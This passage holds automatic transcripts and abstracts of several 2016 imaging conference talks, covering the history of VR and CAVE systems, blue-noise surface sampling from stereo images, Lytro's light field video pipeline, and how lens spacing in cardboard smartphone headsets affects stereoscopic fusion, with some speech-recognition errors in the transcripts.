possibilities. So, between all the wealth of research that was being done with the display and the sort of side track of something like the cave, we leave the moment in time that was as exciting as it is today. I would say that timeframe between 1994, 1995, until about 2001, 2002 is what I call the booming years and we're in the second phase of those booming years. There was a lot of work that was being done, you know, a lot of exciting applications, a lot of engineering companies went to do virtual reality, we saw entertainment, we saw historical things, we saw scientific work and then suddenly, oh, I have a little digression here because this is, I was putting this because a lot of people have been asking me this throughout the day, that caves today are still unusable because they are a million dollars, that's just a little bit of a myth. With today's technology, we can build caves at a very, very inexpensive level. We have built a number of caves and they're 40, 50 thousand dollars, I'm currently developing one that by the time it's finished, it will probably be under 15 thousand dollars. Again, is it the top of the line? No, but if we are willing to make compromises in head mounted display technology like we are doing with the consumer technology that we see today, we should be prepared to do the same kind of compromises in these other technologies. Of course, you can buy a two million dollar head mounted display, you want a military grade, but you can buy three or four hundred dollars, HMD, if you compromise. Same situation with the cave, so this is my little digression in there, so for those of you that were asking me this morning about that. Going back to the time frames, we went through a period that I would say about ten years, which I call also the forgotten years of virtual reality, but the media just forgot all about us. I'm not sure what happened, I think part of what happened is that a lot of industries started to absorb the technology as part of their workflow, as part of the routine work, so it was not exciting anymore, and of course, it was not primarily in entertainment, it was in other aspects of human life, like engineering design, military training, mining operations, and some other things. I even did baby diapers designed for protein and gumball, fluid dynamics on baby pee and things like that in the cave, so that's my joke, but for some reason the press did not pick up on this, so we went through these kind of dark ages of virtual reality, and then suddenly around 2012, hey, we're back on the map because all of us know what happened with Oculus Rift, you know, and that being as a relatively modest project of an individual, it went into Kika started, the initial asking was about $200,000, got over $2 million, got a lot of attention, got the connection with Facebook, and here we are all today. So this is where we are today. When you talk about virtual reality, when the press does you what virtual reality is about, this is what we get. Now, this picture is all photographs from 2014 and 2015, and the little guy on the corner is my son, and that was just a few days ago, so this is very recent pictures. Now, let me back up to the one from the 80s. I see an issue here, guys. Do you guys see the issue? We are stuck where we were 20 years ago, and I don't mean to be negative, I just want people to realize where we are. Yes, we of course know a lot more of what we need to do to make it work. But if you look at what the media was promoting 20 years ago and what the media is promoting today, it's the same. What's the difference? Cheaper? Of course it's cheaper. More commodity hardware? Yes, okay. There used to be more women in the past, that's true. So to me, like I said, since it's the end of the day, I just want to give you some food for thought for the rest of the, for tomorrow, since tomorrow will be the main day for the engineering of virtual reality, because I think we are going on the same path that we were going 20 years ago, and I don't want that to happen. I really don't, because this is a very exciting technology. There's a lot of great things that we can do with it. A lot of the speakers today have presented amazing new technologies that are coming up, so we need to keep ourselves a little bit in focus on what exactly are we doing 20 years later? So my personal approach, Carolina approach, I'm like your financial advisor and your virtual reality advisor. Diversify. What are the point in history where we can be extremely diverse in virtual reality? So all these pictures are from my new center at the University of Arkansas in Little Rock. So we have a Humongous Cave, 26 projectors, more pixels that your eye can see, all that kind of cool stuff, some notes, cluster, la, la, la, la. But we are going, for example, as spherical screens as well. We are doing omnidirectional 360-degree as spherical stereo, utilizing ray tracing, so we compute the stereo at the pixel level. We are doing semi-mercy devices. We have a couple of virtual tables that are just with enough 3D and stereo to perform the task at hand on those tables. Touchable displays, of course, Oculus, Vibes, VR VRs and all that. And we are also experimenting with 3D mobile devices, which they are coming. The picture doesn't show, but again, my little son is my model. So that little tablet that he is using there for augmented reality is actually an autostereoscopic tablet to do that. So I think our approach to this should be diversification on the platforms. That brings a lot of challenges, of course, because developing for these platforms to have your applications, to be able to, I guess, using a term borrowed from the military industry, doing interoperability between all our displays and settings, is actually a really, really hard problem, both from the software engineering aspects as well as the hardware, because there is a lot of performance-related parameters that take into play and a lot of optics and some other issues. So but with this diversification, what is being really cool is that it has allowed us to do a number of interesting applications throughout the years. I have a few applications here and I'm going to let Chris wave at me when I run out of time. So I'll tell you some that are not entertainment, because again, my goal today was to get us to think a little bit beyond entertainment, but they're all very practical applications. The first one is very dear to me because I started doing this work when I was a graduate student and I finished it all when I was an assistant professor at Iowa State University, where we were actually starting to use virtual reality as a front-end to supercomputing simulations. So we were using a pretty, on those days, I was using, for those of you that are my age or older, we were using a connection machine, if you remember the famous connection machines. So I had, I remember it was about a thousand processor connection machine solving the molecular dynamics on the fly connected directly with a fiber optic link to the cave. So as the scientists were in the middle of the cave, they were able to do drug design interactively with the goal of not necessarily find a specific drug for a particular disease, but the goal of this application was to try to reduce the amount of experimental lab testing that the molecular biologists had to do. They had some intuition of some molecular structure that might or might not work, and they were using the cave to try to reduce that spectrum to then minimize the laboratory work. Down the line, we started our evangelical mission to tell engineering companies that this was a technology that will help them tremendously. So my first sort of experience was with John Deere, which is a company everybody knows. We, at least myself personally, worked with them over 12 years. So they were having a design problem that couldn't really figure out through traditional tools. So we used an immersive environment with, of course, 3D stereo and head tracking. And without getting into too much details, we, we helped them to find the problem that they've been really wrestling for months trying to figure out where the problem was. Some other applications, for example, we are working since a number of years now on using virtual reality as a certification tool in different disciplines that are very expensive to certify, like in this case, fire marshal certification for some complicated construction projects are very expensive where depending on what it is that is being built, sometimes they had to build a mockup. And by a mockup, I mean a real, almost half a scale something and then actually burn it and see what happens when there is a fire. So of course, this is a very expensive way to test that. So we've been doing a lot of different virtual reality simulations to helping this kind of testing and certification. I have a couple of quick videos that I wanted to show or something a little bit more recent since I'm out of time here. So let me just show this video real quick. So this is just something recent that we've been, we've been doing. This actually we send it out for SIGGRAPH, the deadline was yesterday for the VR village exhibit. So this is our little 3D table. It has a narration, but I'm not going to go through that. So let me skip a little bit where you can see it. So here you have our environment. Again, it's a lot simpler to use. Right now we have a smart drive just because we recycle it from the lab. So it gives us the right level of immersion, the right level of stereoscopic to do this particular task at hand, which is interactive dissection of a virtual cadaver. So this particular project is in the process of being commercialized and transferred to different medical schools because at this particular level that's what they need. They need to have their master physician that is teaching anatomy with the students in the surrounding kind of nearby looking at it the same way they would be looking at a cadaver, but at the same time they need to be able to see each other so they can have some conversations and some saying look at this, look at that, look at that. So there are a lot of interesting things out there that are beyond, again, gaming and entertainment that I think our technology can significantly help. And I'm going to skip real quick. You give me 30 seconds. Basically, I tried to condense my 20-something years of experience in like 15 minutes, but some of the things that I learned over the years, it certainly hurts a lot. I know we get very excited about what we're doing. I know we like people around us to get very excited about what we're doing, but we have to be a little bit careful to say, hey, this is all the things that we can do when in reality we're not even quite there yet. We have to be very, very careful with that. Another thing is one size doesn't fit all, and that applies really, really well for VR. There's a lot of flavors. There's a lot of varieties for virtual reality. So let's not just get hung up on one particular kind of virtual reality. Keep in mind it's just technology. A few years from now there will be some other things, but the concept is really how do we get to this there that there is generated in the computer. Another thing too, of course, is that in many contexts sometimes being able to have a group of people face to face, sharing the virtual space is what you need. And again, we can do collaborative virtual environments with representing your own body through avatars and all that. It's not the same. The face to face, the body language, the smiles, the little twitch on your face and all that is still very, very important in certain contexts for communications. I cannot say any more. It's a lot more than a really cool gaming and entertainment platform. But at the same time, when we get outside gaming, I see lots and lots of people doing work that is just flying through pretty models. There's a lot more to gaming, but there's also a lot more than just flying through pretty models where really nothing really happens. And then, of course, the infrastructure to do these things is still not quite at the level that it should be, so we can really unleash our own creativity. So that goes to all the people developing SDKs and that kind of thing. And we have very little interoperability between different platforms. I can guarantee you right now what I run in my devices is going to be really, really hard for you to run it in your own devices. And when you run on your device, it's going to be really hard for me to run it in my device because we don't have a lot of common infrastructure to do that. So with that, this is what I think is going to be hopefully the next 15 years, 10 years or so. Again, remember your financial VR advisor, diversify. All right, so with that, I appreciate your time and thank you very much.
|
The recent resurgence of VR is exciting and encouraging because the technology is at a point that it soon will be available for a very large audience in the consumer market. However, it has also been a little bit disappointing to see that VR technology is mostly being portrayed as the ultimate gaming environment and the new way to experience movies. VR is much more than that, there has been a wide number or groups around the world using VR for the past twenty years in engineering, design, training, medical treatments and many other areas beyond gaming and entertainment that seem to have been forgotten in the public perception. Furthermore, VR technology is also much more than goggles, there are many ways to build devices and systems to immerse users in virtual environments. And finally, there are also a lot of challenges in aspects related to creating engaging, effective, and safe VR applications. This talk will present our experiences in developing VR technology, creating applications in many industry fields, exploring the effect of VR exposure to users, and experimenting with different immersive interaction models. The talk will provide a much wider perspective on what VR is, its benefits and limitations, and how it has the potential to become a key technology to improve many aspects of human life. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32236 (DOI)
|
This is Frederic Fajal from France. He received a PhD degree in signal image processing in 2004 from University of Nice. And he is now assistant professor at the same university and researcher in I2S in CNRS. And his research interests include geometry processing and in particular compression remeshing and sampling of surfaces. And the paper, of course, is entitled Blue Noise Sampling of Surfaces from Stereoscopic Images. So, thank you for this introduction. Hello everybody. I'm going to present a work done with my PhD student Jean-Luc Perrault and with Marc Antonini, his second supervisor. Our subject is very different than the previous topics. I'm going to talk about sampling of surfaces from stereoscopic images. Here is the summary of my talk. I first introduce the context, the motivation and the objective of our work. Then I will present the notion of blue noise sampling. I will give you some details about the method we propose for sampling the surfaces. Then I will give some experimental results and a conclusion. The context of our studies is the digitization of 3D objects. Today, acquisition systems are able to create very massive point clouds to ensure the preservation of the finest detail. The consequence is that the meshes we obtain from these point clouds are huge with a lot of triangles. Sometimes the management of such surface meshes is very difficult or even impossible with mobile devices or workstation with limited capacities. One solution until now, the main one, is to add an additional step to enable the management. This extra processing can be a simplification of the meshes to reduce the number of vertices. It can be a remeshing step that will modify the connectivity and the geometry of the surface mesh. If possible, to make a new mesh structured, it will simplify the process. It can be a semi-regular remeshing, for example. It can be also a resampling step that will change the position of the vertices onto the surface. Most of the time, it will also reduce the number of vertices. Finally, we can see that when we want to handle a numerical version of a physical object, there is a very long pipeline before the management. Moreover, the three main stages, acquisition, meshing and resampling, for example, are done in three different devices or softwares. Our motivation during this research is to simplify this long pipeline that is needed for managing any 3D data generated by acquisition device. Today, we only investigate the specific case of stereoscopic acquisition systems, and we only focus on the specific sampling called the blue-nosed sampling. Our objective is to shorten this pipeline to get the good sampling, the blue-nosed sampling, at the output of the acquisition device and avoid the additional steps after. Our main idea is to generate the sampling pattern directly from the stereoscopic images. I just talked about the blue-nosed sampling. I will briefly present this specific pattern. The blue-nosed sampling is known in image processing for its ability to avoid aliasing artifacts. In computer graphics, it is also a popular sampling because these characteristics are relevant for many applications, in rendering, imaging, numerical, simulation, geometry processing, and so on. This sampling pattern is often associated to a Poisson disk distribution. You can see an example on the top right, on the two-dimensional domain. We have also an example on the middle right on the surface. This sampling pattern has a particularity. It is a uniform distribution in the sense that there is a minimal distance between all the samples, but it is also an irregular distribution in the sense that the sampling is not directionally dependent. Until now, there are two kinds of methods, two sampling surfaces, two sample surfaces. The first method is a direct method. The idea is to sample the surfaces directly into this space, onto the surface. It is more accurate, but sometimes it is time-consuming because we have to compute some geodesic distance all over the surfaces between the samples. The second big family of methods for sampling surfaces is the parametrization-based method. Simple, but sometimes less efficient. The idea is to take the geometry of the surface to project this information on a two-dimensional domain to make the sampling in this domain and after to go back in 3D space. It is simple because for the computation of the distance, it is easier, but sometimes the sampling pattern at the end in 3D space may suffer from parametrization distortion. Now I will present the method we proposed with Marc and Jean-Luc. I remind you that the objective is to shorten the full pipeline. We are going to find the good samples for the final surfaces from the two stereoscopic images. Starting from two stereoscopic images on the left, shot with the system shown on the figure left, we are going to make the stirr matching to know the part of the object we can't reconstruct. Then the second step will be a pixel classification. The goal will be to detect feature lines to preserve them after during the sampling. Then the third step is the sampling itself that will give at the end a final 3D sampling of the surface we want to acquire. Note that the two last steps need the computation of the 3D position associated to the pixel of interest. The first step is a very classic step, well known. It is the stirr matching. The objective is to determine the pixel of interest that will represent the part of the object that we can reconstruct from the pair of images we have on the left. In our case, the pixel of interest are the white pixels on the image in the middle of the slide. I don't give more details, it's a very classical step. The second step in our method is to classify the pixels in function of the curvature of the associated points onto the surface. The main goal is to detect the sharp features of the surface in order to preserve them during the sampling. The technique is very easy, we are going to classify the pixel in function of the curvature of the points associated on the surface. A pixel in the POI region could be a sharp feature if it belongs to a sharp feature on the surface we acquire. It can be a corner, an intersection of several sharp features, or it can be a smooth pixel if it is on a flat region, a smooth region. To evaluate the curvature, we compute a tensor T for each pixel of interest with the equation given on this slide. This equation will depend on the 3D normals of the pixels around the pixel we want to estimate the curvature. Once we have computed this tensor for a given pixel, we have to compute the eigenvalues. These eigenvalues will give an idea of the curvature, the minimum and the maximum curvature onto the surface. Once we know the three eigenvalues, we just check if this condition is respected to know if a pixel corresponds to a point in a surface. With this condition, we know if a pixel belongs to sharp features or not. On the right, you have a result of this step. We can see in blue, in the middle right, the pixels considered as sharp features. We can see that it is not precise enough, so we make an additional step, that is the computation of the median lines. It is the computation of the skeleton of this set of pixels. Finally, we have a more precise result. We can see in red, the description of the sharp features of the object we just processed. Now, we can begin the sampling. This technique is based on three steps. The first is just to put samples on the corners, on the pixels associated to corners on the surfaces. Then, we will distribute some samples among the sharp pixels and then among the smooth pixels. Hence, we will preserve the sharp features as much as possible. To distribute the samples among the sharp and the smooth pixels, we use a very classical method called the darts-throwing. The technique is easy to understand. We just have to pick out a sample on the domain randomly. We draw a disk around it for a given radius r. Then, if this disk intersects another one, already a drum, we discard this candidate. It is not a good sample. Otherwise, if the disk does not intersect another one, we keep this sample. It is a good one. These three steps are repeated until the number of samples we want is reached or no more places are available. When we sample surfaces, most of the time the sampling is adaptive. The idea is to adapt the radius associated to a sample in function of the curvature of the surface. The advantage is that we will put more samples in the regions with high curvatures and the fidelity to the original shape is better. In our case, we will use this equation that depends on the eigenvalues we computed before in the classification step. The last particularity of our method is how we compute the arrays of the disk associated to a candidate sample. For a candidate pixel, we use a region-growing technique based on Jigstra algorithm to compute the surface in the arrays around a candidate. The particularity of our method is that this region-growing is driven by the connectivity of the stereoscopic images. We compute the real distance in the 3D space to have a better accuracy of the distance over the surfaces. We have the advantage of the parametrization method presented before, but also the advantage of the direct method that computes a geodesic distance over the surface. Now, I will show you some results. The first result is a simple test. We took a cylinder. We compute its pyregion and detect sharp features. We can see that there is no sharp feature. It is just a cylinder. Then we make the sampling on the left image and we obtain the final sampling pattern with 500 samples in the second column and with 1000 samples on the right. We can see that our method from the left image and the right image can produce a good sampling pattern directly on the surface. A second example on the object already presented at the beginning of this presentation. This object is actually a part of a wall with several sharp features and several corners. We can see that on this object we easily detect the sharp features already shown before. After the sampling, we have a final sampling pattern that will respect the sharp features and also distribute the samples all over the surface in the smooth region. I just gave some visual results but I don't talk about the quality of the sampling pattern. I recall that we want a blue noise sampling so we have to check if the features of such a sampling pattern is respected. For this, we usually use the periodogram of the sampling that represents the distribution of the distance between the samples. From this periodogram, we generally compute two features, two properties, the wraps and the anisotropy. The wraps will quantify the radial distribution of the distance between the samples. The anisotropy will evaluate the radial uniformity of the sampling pattern. In other words, we check if the sampling is not directionally dependent. The X axis describes the distance between samples on the figure in the middle and on the right. Ideally, the wraps of blue noise sampling presents a wrap similar to a step function, proving that the minimum distance is respected between samples and the anisotropy is low and flat. I'll give you now some results on the object wall. We compare our method with a direct method, the green cure, that we consider as the ground truth because this method is very efficient and done directly in the 3D space. We also compare with two-dimensional noise sampling where we sample the stereoscopic images but we do not take into account the geometry. We can observe that our method produces wraps very close to the direct method and much better than the 2D noise sampling. To conclude, I can conclude.
|
We propose an original sampling technique for surfaces generated by stereoscopic acquisition systems. The idea is to make the sampling of these surfaces directly on the pair of stereoscopic images, instead of doing it on the meshes created by triangulation of the point clouds given by the acquisition system. Point clouds are generally dense, and consequently the resulting meshes are oversampled (this is why a re-sampling of the meshes is often done). Moving the sampling stage in the 2D image domain greatly simplifies the classical sampling pipeline, allows to control the number of points from the beginning of the sampling/reconstruction process, and optimizes the size of the generated data. More precisely, we developed a feature-preserving Poisson-disk sampling technique applied to the 2D image domain - which can be seen as a parameterization domain - with inter-sample distances still computed in the 3D space, to reduce the distortion due the embedding in R^3. Experimental results show that our method generates 3D sampling patterns with nice blue noise properties in R^3 (comparable to direct 3D sampling methods), while keeping the geometrical features of the scanned surface. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32237 (DOI)
|
10, capturing and rendering light field video from Tim Millerin, Milliron, who is perhaps the VP of Engineering at Lytro. Do I have that part right? Awesome. So he's certainly the VP of Engineering at Lytro. And prior to that, you were at Pixar doing more jobs I can remember from your LinkedIn profile. The tricky one with the computers. So hi, everybody. I'm Tim Millerin. I'm the Vice President of Engineering at Lytro. As I was introduced, I spent about 12 years at Pixar and the last five years at a little company called Twilio, which is a telecom startup. You can ask me about how that transition happened later. But today I'm going to talk about capturing and rendering light field video. And in particular, at Lytro, we're building a system that I'm going to talk quite a bit about called the Lytro Emerge. Lytro Emerge is a 360-degree light field capture device and end-to-end solution for playback. And I'm going to talk a little bit about the approaches that we're undertaking to build that as well as the challenges that we're seeing there. So first of all, a little bit about Lytro. So Lytro was founded in 2006. And I think Lytro's big claim to fame is that the company was the first to bring a planoptic camera to market. Some of you may actually remember this. It was an odd little thing. It looked kind of like a stick of butter. We call it the butter stick at Lytro. It had a fixed lens. And most importantly, it had a micro lens array that sat in front of the sensor that captured the light field that was coming into the lens of the camera. So you got some really interesting effects. And it allowed photographers to do things that they'd never really done before, like, for instance, changing focus of a picture after the fact, because we have all of this light field information. In 2014, we launched our second camera called the Lytro Illume. The Lytro Illume was obviously a much bigger camera. It had a much better lens. And it could produce sort of professional level quality pictures. But both of these two cameras, even though they allowed photographers to do things that they'd never done before that were never possible, they have big trade-offs in terms of resolution and in terms of cost. Because by capturing the entire light field, we have to throw away some image density, some resolution in the final 2D camera. So these were really the only, these consumer cameras, really the only things we could build at the time that they were launched. But of course, with Moore's law, we now have, and continue to have, exponentially increasing storage density and computing power. We also have the cloud that gives us an exponentially lot more computing power on demand. And so now more applications are finally within the reach of light field technology, although, as you'll see, just barely within the reach of light field technology. And so last October, we announced LytroEmerge. So this is a conceptual rendering of what the emerge will look like. This is a 360-degree light field camera device. It's about three-quarters of a meter across. So you can think of this as capturing the light field volume within that three-quarters of a meter. That allows you to do interesting things like move your head around within that volume, and get true parallax effects and real-time light, and, oh, sorry, few dependent lighting effects and so on. So the viewer can move their head around inside this volume and really give you a lot more from VR. Why do we care about this? We care about this in a word because of presence. So I'm curious, how many of you have put on a headset and watched a 360-degree video? Okay, a lot of you. Stereoscopic 360-degree video and some actual computer-generated content. Probably everybody. So there's a real big difference between those different levels in terms of what the VR experience is, and it really has a lot to do with presence. You obviously are throwing away a ton of information in a 360 video. You can move your head around. You can rotate your head, but you can't get any parallax effects. You can't feel as if you're there quite the same way. And in some of these CG demos that we see in VR, you have a much more immersive experience. You feel like you're in that environment because that environment responds to everything you're doing on a headset like the Oculus. So 6 degrees of freedom really puts you there, and I think that's what we're all excited about with VR, but we don't have the capability yet to capture that in live action. So Emerge was an announcement that we made to build, and based on things that we believe that we can build and things that we are building today, there's a ton of engineering work going on with a team of about 30 at Lightro today to bring it to market and to actually productize it and make it useful. And in this talk, what I'm going to do is I'm going to dive into and give you a sneak peek into the system architecture of Emerge and discuss some of the big computing and algorithmic challenges that we have in order to finally bring it to market. So first thing I want to point out is that Emerge is different than our previous cameras. Our previous cameras used microlenses, and they were true phenoptic cameras. Emerge is different than that, Emerge is a multi-camera system, but it uses all the same principles of light field. So let's dive into the architecture here. So there's really four key pieces to the architecture. One is capture. Now, of course, that includes the camera, and we'll talk a little bit about how many cameras we have in this array, how configurable it is, that kind of thing. But because of the enormous data rates, which again we'll talk more about as well, there's also an on-set server that will sit 50 meters, 100 meters away from the production that actually captures the data. And we need to do this on-site because of enormous IO throughput that you'll see in a bit. The second phase is construction. Taking that raw information, the raw capture from these 60, 100, couple hundred cameras, and then turning that into a light field representation that we can use further down in the pipeline. Editing is a really important part that's often left out of this. Content creators are really used to editing their footage after the fact. Because they're doing that in VR, especially for repair, to smooth out seam lines in a 360 stitched video, for instance, but also frequently they're doing that for creative reasons as well. And so editing is a really important part, and light field editing in particular is very challenging because of the enormous data that you have, the redundancy of information, and figuring out a way for those content creators to use the tools that they're used to in order to do editing is key. And then finally, of course, there's playback on the headset. So it's really these four key areas, these four pieces of the system that provide an end-to-end experience for content creators to shoot their footage, produce it, and then actually play it back on the device. So I'm going to walk through what the system goals are for these in brief, just to give you a sense. And then we'll start talking about some of the big computing challenges and how we're thinking about solving them. So first of all, light field capture. We want to match the native frame rates on the latest generation displays, or the displays that will be out later this year. So we're talking about 90 frames per second for creative content. This needs to be a 10-bit of HDR. And in terms of the practical considerations of how you use this thing on set, it needs to be able to store hours of footage at a time on our servers. So you go to set, strike times on sets, usually 7 AM, and then you work until about 5. You're not going to capture all 10 hours of that footage, but you need to be able to capture probably three or four hours of footage all in one go. In terms of light field construction, for those of you not familiar with how the film and video production process works, the usual expectation is you show up today on Monday morning, you shoot your stuff all day long, and then you go home, everybody takes a rest, and then tomorrow morning you come back in and you expect to see what are called dailies. You expect to see whatever you shot yesterday projected on screen. Now in the case of VR, what we're expecting is that you need to be able to put on the headset and see what you got so that you know what decisions you need to make in terms of shooting for that day. And so targeting a nightly turnaround time to be able to take the hours of footage that we have captured on day one and then be able to play that back on the morning of day two is a really important part of the process. In terms of light field editing, again, content creators are very used to editing their content after the fact, but in this case we now have tens or hundreds of camera views or we have a light field. And so we need to come up with tools for content creators either to propagate their edits between cameras possibly or to efficiently edit the light field directly, which is of course a new territory that we haven't done before. And then finally, in terms of light field playback, we need to be able to play back again 360 degrees of this one meter sized volleyball or sort of beach ball size that's around your shoulders at 90 FPS and on what I'm calling commodity hardware. Make no mistake about it. In the early days, I doubt very much that my machine here, little MacBook Pro, is going to be able to play back this content, but we do need to be able to play this back on sort of a big, beefy gaming box rather than a supercomputer. So there are obviously a bunch of challenges here and what I'm going to talk through first is each of those challenges across each of these areas and also the solutions that we're attempting to roll out for these. There are some really big, interesting challenges both on the hardware side and on the software side. So let's dive into capture, first of all. So on the capture side, just to give you a sense of the scale of the system, our system will operate. We're still figuring out densities and there is configurability so that you can shoot 90 degrees, 180 degrees, 360 degrees. But we're talking about 60 to 200 cameras, give or take, so dozens to hundreds of cameras. Each of those is capturing a 2K by 2K stream at 10 bits at 90 FPS. And so just doing the math, for those of you who are doing math at home, that is almost 100 gigabytes per second of data rate from the camera to the servers, which is obviously a lot. And again, doing the math, that means about 6 terabytes per minute of storage. This is obviously an enormous system, very high-cost system to be able to do all of this. But most importantly is the IO throughput that's required in order to get to that system. And so our system engineers have done a lot of work in terms of how many computers or how many cameras can wire into each computer, what are the drives, what are the cards that you need in order to do camera intake in order to be able to support these massive data rates. And then of course, as I said, we need to do hours of stored footage on set, which means those computers need to be pretty big as well. On the construction side, there are a couple of things that are really important. So obviously we're synthesizing views from the fundamental footage, the raw footage, from tens or hundreds of cameras. That means that we need really accurate color and positional information and calibration information from the cameras. So that's kind of table stakes. The good news at LITRO is that because we're a consumer manufacturing company for a while and we're used to dealing with MLA's and sensors that were all different, but we had to produce good images with all of them, we're really good at this kind of thing. But we also need accurate depth information. And the reason for that is that even though we are very much an image-based approach, in order to get away with dozens or hundreds of cameras instead of say thousands or tens of thousands of cameras where you could do pure image interpolation, our light field algorithms rely on reasonably accurate depth information for view interpolation. So you require that reconstruction as well. So the good news here, of course, is that we have tons of data to work from to get accurate depth. We have dozens or hundreds of camera viewpoints and we have a pretty good notion about where those cameras are, but it's still a very difficult problem to solve. So there's no way around this. This takes a lot of time. Right now we run at about 30 seconds per, sorry, 30 minutes per frame. That can certainly be optimized, but it's certainly not going to become milliseconds per frame for free. And then just as you think, well, that's okay. You just throw it up all to the cloud. Remember the data transfer rates. So transferring to the cloud over my very fast internet connection at home at 100 megabits per second, assuming that I could get that from Comcast, would take dozens of hours per minute of footage. So you have to think a little bit outside the box here. So on the depth reconstruction side, there's really no other way around this. You just need to hire the best people on the planet in order to solve these problems. There are some breakthroughs that will be needed before we get to truly great depth information there as well. And then on the cloud side, it is true that actually the cloud is the way to get to nighttime processing. You can't build a portable 1000 node render farm that rolls around with your camera. And so we do need to solve this with cloud, but you consider some unconventional cloud transfer techniques. And what I mean by unconventional is, for instance, you might take your servers and you might take them off of set at 5 p.m. and drive them to a co-location facility somewhere nearby the set, perhaps in LA, if you're shooting in LA, and plug it into a terabit ethernet connection to S3 or to Azure or to Google Cloud. And so there are some very interesting ways that we might sort of transfer this data to the cloud and get it there quickly, but do it in sort of unconventional ways. Another trick very frequently used in the film and video production area is to actually ship hard drives. So hard drives get FedExed back and forth from San Francisco to LA all the time. And so getting to that overnight time that we need is really going to be dependent in large part on the data transfer and some unconventional ways of doing that. On the editing side, again, we run into the big problem of light field size data processing, which is very different than image size data processing. So the key thing here is that artists are not going to change their workflows. And so we are building a set of plugins in standard VFX tools. One of the big requirements is that whatever artists are currently using, they need to be able to continue to use. Nuke by the Foundry is one of the dominant packages here. And so we are using that and building for that first and then other things later. But the workflow that we actually imagine is that Nuke is actually running in the cloud. And you are running on a cloud data set, running in the cloud, or some other packages running in the cloud. And there's a lot of work that's happening in this regard, but very much of it is not all the way there yet. And then finally, on the playback side, again, data rates. We're talking about 40 gigabytes per second in order to store on the local disk. We don't actually need all of that in order to play back through the headset. We have ways of pruning that. But we are talking about a gigabyte a second or so of data rate from the disk in order to get into the display and play through the GPU and the CPU. And so no magic here. The secret is really codex, codex, codex. The great news is that light field provides us with a plethora of ways that we can compress. Of course, you have your image space compression and your temporal compression. But we also have a lot of redundancy in the light field volume itself. Most of the views within the volume are very similar to other views. And so there are great opportunities to do a lot of compression there that's really quite novel and that can get us down to file sizes that probably won't be able to stream any time soon, but that at least can play back and fit on a normal hard drive. So I think that gives you a pretty good sense of what we're building and what some of the big computational challenges are there. We're really and incredibly excited to bring light field technology into this new industry and we can't wait to see how it evolves and how people start using it. Thank you. That's all I had. I'm happy to take any questions. To start with, a number of people from different standard levels are actually living dorms.
|
Lytro is building a revolutionary system to record and render the light-field of live-action video, enabling viewers to immerse themselves in 3D cinematic VR experiences. In this presentation, we will describe our system design for capturing, processing, and rendering light-field video and discuss the significant data and computing challenges to be solved on our journey. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32240 (DOI)
|
This will be about the effect of inter lens distance on the fusional limit in stereoscopic vision using a simple smart phone head mounted display. Mr. Hiryuki Morakawa will speak. Mr. Morakawa is an assistant professor in the Department of Integrated Information Technology at the Iyama Gaikuin University in Japan. Thank you, Mr. Hiryuki Morakawa for introducing. I'd like to give presentation that titled, Effective of Inter-Lens Distance on Fusional Limit in Stereoscopic Vision using a Simple Smart Phone Head Mounted Display. The Simple Head Mounted Display is attracting attention. The HMD uses the smart phone as a display and its fate over low cost materials such as cardboards. One of the most famous example is Google Cardboards. Unfortunately I can't find the common name of the HMD of this type. Accordingly I referred to this HMD as Simple HMD in this 3D. This Simple HMD is convenient for viewing 360 degree movies or VR content. Moreover, such HMDs can display stereoscopic images by showing images for left and right eyes separately. Since they can be manufactured at a low price, there are many HMDs of various designs in market. In addition, the smart phone that is used in the HMD is also developed. The viewing environment of stereoscopic images changes depending on the combination of these elements. Regarding binary cloud vision, differences in the viewing environment might cause eye fatigue and visually induce motion sickness. Therefore, effect of difference of HMD design must be examined from the point of view of safety. In this study, we considered that what element of Simple HMD affects the viewing of stereoscopic image. There are several elements of design of Simple HMD that might affect for stereoscopic vision. These elements contain as follows, internal distance, interpupillary distance. Hereafter, it's called IPD, optical materials. This means many lens quality such as aberration or distortion and display size of a smart phone. In this study, we focused on internal distance and IPD and examined the effect of these elements for stereoscopic vision. I'd like to explain how does the change of internal distance affect the stereoscopic viewing. The display of a smart phone was put on near eyes. Thus, it is difficult to focus on the display because the focal length is too short. Therefore, the lens is used to magnify the display and to extend the focal length. The image of the display is observed as a virtual image. The stereoscopic image is represented by viewing the virtual image from both left and right eyes. When the image of the display is magnified, the center of magnification is the axis of lens. The internal distance changes, the center of the image magnification also changes. The sector of the image by magnification is rather than the sector of the center point. As a result, the disparity of stereoscopic image is changed even if the same image is shown on the same display. In this slide, I'll explain about experimental condition. We designed three HMD conditions by internal distance and a control condition by using 3D liquid crystal display. The HMD used for the experiment was prepared using the Google Cardboard template available from Google. The lens mount was adjusted and 3 HMD warp prepared with internal distances of 57.5, 60.0, and 62.5 mm as experimental conditions. We also prepared the control condition using 3D liquid crystal display. The display was used 23-inch passive 3D display. Polarized glasses were used to view the circle image with this display. The viewing distance was set to 370 mm in order that the angle of view is equalized with HMD conditions. As HMD conditions, a smartphone weight of 5-inch display was used as a display. A virtual image was viewed at 360 mm using the lens with 45 mm focal length. The stimulus, a random dot signal mount was used. The stimulus image consisted of a background target. The visual target as a circle without an outline. To determine the fusion, the visual target was designed such as that a circle could only be perceived when the target image were fused. The disparity of visual target was controlled by moving the circle to left or right. In addition to avoid the vertical disparity occurring by rotation of smartphone, white horizontal line were placed at the top and bottom of the target. To evaluate the effect of the difference of the internal distance, the fusion limit was measured corresponding to the difference of the internal distance with the up and down method. The participants viewed the target with a contrasting disparity. The participants indicated when they judged that the image were fused and when the image were not. They first viewed the stimulus with increasing disparity upon indicating that the images were fused. The disparity was then decreased until they indicated that the image were no longer fused. The disparity was increased and decreased alternately six times. The average of the reported disparity in the last four trials was calculated as a result. The far and near fusion limits were measured independently. The participants provided informed consent to put participants in the experiment. Subsequently, the stereoscopic vision function was tested and confirmed to be normal. Each participant's IPD was also measured. The participants practiced the measurements using the up and down method prior to the experiment. Following the measurements of the far and near fusion limit and the control condition using a liquid crystal display, both fusion limits were measured under the three HMD conditions. Combining the four conditions to the fusion limits and the six trials, the measurement was repeated 48 times in total. There were 19 participants and average age was 21.6 years. However, the results from 70 participants were available. This figure shows the environment of experiment. When the participants viewed the image through the HMD, their chains were fixed on the chain rest and they were not allowed to move the HMD. The position overhead was also fixed with the control condition using the same chain rest. To prevent this HMD from tilting, its housing was fixed by the participants with both hands. The similar image was presented by sending the image to the smartphone wire through from a PC to explain the control with the disparity. I'd like to show the result. This figure shows the average of both fusion limits as a disparity angle regarding the control conditions and three HMD conditions. Negative value means the flux of near 